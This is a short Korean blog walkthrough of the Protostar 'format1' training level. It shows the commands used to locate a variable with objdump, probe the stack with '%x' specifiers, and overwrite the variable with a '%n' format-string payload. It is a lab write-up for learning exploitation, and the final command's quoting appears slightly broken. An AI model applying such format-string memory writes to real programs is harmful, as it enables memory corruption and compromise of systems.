반응형
This level shows how format strings can be used to modify arbitrary memory locations.
Hints:
objdump -t is your friend, and your input string lies far up the stack :)
This level is at /opt/protostar/bin/format1
힌트를 보니 objdump -t 가 있다.
| >objdump -t format1 | grep target |
format1에서 target 주소를 알아낸다.
| ./format1 $(python -c "print 'AAAA'+'%x:'*153") |
41414141이 151번째,
target이 152번째에 오게 하면 된다
target의 값을 변조시켜야 한다.
| >./format1 $(python -c "print 'AAAA' + '\x38\x96\x04\x08' + '%x.'*154" + '%n.') |
마지막 152번째 %x를 %n으로 바꿔주어 위의 명령어를 실행한다.
끝
반응형
'system' 카테고리의 다른 글
| [protostar]format3 (0) | 2020.11.05 |
|---|---|
| [protostar]format2 (0) | 2020.11.04 |
| [protostar]format0 (0) | 2020.11.02 |
| [protostar]stack6.c (0) | 2020.11.02 |
| [protostar]stack4.c (0) | 2020.09.24 |
